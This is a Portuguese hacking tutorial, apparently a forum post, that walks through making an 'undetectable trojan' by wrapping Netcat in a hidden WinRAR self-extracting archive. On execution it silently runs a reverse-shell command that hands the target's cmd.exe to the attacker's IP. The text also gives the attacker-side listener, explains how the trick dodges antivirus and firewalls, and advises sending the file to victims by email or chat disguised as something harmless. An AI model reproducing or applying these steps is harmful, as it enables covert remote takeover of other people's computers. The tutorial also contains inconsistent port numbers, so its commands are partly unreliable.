Criando Um trojan indetectável usando o NetCat e o WinRar

Com certeza uma das maiores dificuldades de se fazer um ataque por trojan, está na camuflagem do "bixo", pois os anti-vírus estão cada vez mais avan´ados, tornando a invasão por trojan algo muito difícil, pois para camuflar o mesmo teríamos que entender a fundo o a estrutura dos executáveis para windows, cabe´alhos PE, sem contar com programa´ão em assembly para podermos editar o trojan usando um editores hexadecimais e debuggers, para deixá-lo invisível aos olhos do ainti-vírus, é claro que há exce´ões que você poderá editar apenas usando um explorador de PE como o ResourceHacker. Então, se você conhece todos os assuntos citados anteriormente, OK você com certeza poderá fazer com que seu trojan passe despercebido pelo anti-vírus, mas... e o Firewall? Qual será o truque para burla-lo? Bom, acho que já está na hora de te apresentar uma técnica de cria´ão de trojan que faz o mesmo passar despercebido diante destes dois sistemas de prote´ão, esta técnica consiste em compactar o executável do NetCat (nc.exe) usando o WinRar e usando as op´ões de SFX do mesmo nos permitirá criar um trojan que fa´a conexão reversa, indetectável tanto aos olhos do anti-vírus como do firewall, Por que? Isso vou te explicar no decorrer deste artigo, Seja bem vindo!

 O que é Conexão Reversa?

A conexão reversa é um tipo de invasão parecida com uma invasão por trojan, só que ao invés de o hacker se conectar ao alvo, como é feito tipicamente usando trojans, o alvo é quem se conecta ao hacker, dando-lhe total acesso a máquina invadida e fazendo com que bloqueios como firewalls sejam facilmente burlados e também é muito útil quando se quer invadir um computador que esteja na rede interna, já que a vítima é quem se conecta ao invasor.

 Sobre o NetCat

O NetCat que é considerado pelos hackers o canivete suí´o do TCP/IP, devido a sua incrível flexibilidade, com o NC(NetCat), podemos fazer desde uma simples conexão a um host até um brute force por wordlist, para quebrar senhas de um determinado servi´o.

Você pode baixar o NetCat para Windows em Somente usuários registrados poderão ver os links.

A maioria das distros linux já vem com essa ferramenta pré-instalada, mas caso não venha você poderá baixa-lá em Somente usuários registrados poderão ver os links.

 Sobre o WinRar

WinRAR parece nome de super-herói mas é o nome da versão para Windows do compactador de arquivos RAR.

O WinRar para Windows em Português do brasil pode ser baixado em Somente usuários registrados poderão ver os links.

Por que indetectável?

Primeiro vou explicar por que o trojan criado usando esta técnica é indetectável pelo o anti-vírus depois explico porque o mesmo é indetectável pelo firewall.

 Anti-vírus:

Simples, nenhum anti-vírus, (pelo menos os do meu conhecimento) julgam o NetCat e o WinRar como programas nocivos. Por isso quando um anti-vírus faz uma varredura em um trojan feito usando esta técnica, ele só vai encontrar um executável criado pelo WinRar com o NetCat dentro dele compactado, e não vai emitir avisos pois trata-se de um programa inócuo (aos olhos do anti-vírus).

 Firewall:

Como este trojan vai usar conexão reversa, nós não vamos ter que nos preocupar com firewalls porque a maioria dos firewall bloqueiam programas que queiram abrir portas, não os que simplesmente querem se conectar a uma determinada porta que já esteja aberta. Resumindo: Os firewalls se preocupam mais em proteger de fora pra dentro do que de dentro pra fora. Não entendeu? Então eu te explico melhor: Se você instala um trojan convencional que tente abrir uma porta na máquina da vítima para que o hacker se conecte, o firewall com certeza vai te bloquear, mas se você envia um trojan que vá se conectar a uma porta já aberta no seu computador (neste caso você é o invasor), dificilmente o firewall vai te bloquear.

 Mãos a Obra!

Agora que já conhecemos estas duas magníficas ferramentas, vamos ao que realmente interessa, vamos iniciar a cria´ão do nosso trojan, então siga o passo-a-passo abaixo, mas "use com modera´ão" wink.gif

 Após baixar e descompactar o NetCat, abra a pasta onde você descompactou os arquivos do NetCat e compacte apenas o arquivo nc.exe usando o WinRar.

 Abra o Arquivo compactado, clicando duas vezes sobre o mesmo e em seguida clique no botão SFX, e logo após em "Op´ões Avan´adas de SFX".

 Agora em Caminho para extra´ão, informe o diretório onde você quer que o arquivo seja extraído, nos meus testes eu coloquei c:windowssystem32. No grupo Configura´ões do Programa e no campo Executar após a extra´ão informe os seguintes parâmetros:

 nc -d 192.168.28.2 1020 -e cmd.exe - isso fará com que o assim que executado o trojan se conecte a você.

 Onde o IP (192.168.28.2) deverá ser substituído pelo seu, já que é a vítima que vai se conectar a você, e você também poderá substituir a porta (que está logo após o IP) por outra de sua preferência.

 Agora clique na Aba Métodos

   No Grupo de op´ões Método de espera, marque a op´ão Ocultar tudo, esta op´ão serve para que o NetCat seja executado em segundo plano, para que o alvo não perceba que está rodando um programa malicioso no seu computador. Logo em seguida no grupo de op´ões Métodos de Substitui´ão, marque a op´ão Ignorar arquivos existentes para que o WinRar não nos dedure.

 Clique na Aba Texto e ícone e escolha um ícone para o executável do seu trojan, clicando em Procurar.

 Finalmente clique em OK nas duas janelas abertas e em seguida feixe o WinRar e Pronto! O seu trojan indetectável já está pronto, agora no seu computador vamos configurar o NetCat para que ele fique escutando em uma determinada porta (nos meus testes ou configurei a porta 1020). Veja abaixo como fazer isto:

Copei o arquivo nc.exe para a pasta c:windowssystem32

Vá no menu Iniciar >> Executar >> Digite "cmd" (sem as aspas)

E agora vamos deixar o NetCat na escuta na porta 1020 (lembre-se que tem que ser a que você configurou quando criava o trojan). No prompt de comando digite:

  nc -l -n -p 2525 -vv

 Em seguida ele ficará assim:

C:Documents and SettingsAlison RobsonDesktop c111nt>nc -l -n -p 1020 -vv

listening on any 1020 ...

 O NetCat já está na escuta, apenas esperando pela conexão do seu alvo. Agora só te resta enviar o trojan para o seu alvo por eMail, Chat, etc, como se fosse algo inofensivo e esperar que ele o execute, pois no mesmo instante em que o trojan é executado ele se conectará instantaneamente a você te dando de presente um belo Shell, como o da representa´ão abaixo:

 C:Documents and SettingsAlison RobsonDesktop c111nt>nc -l -n -p 1020 -vv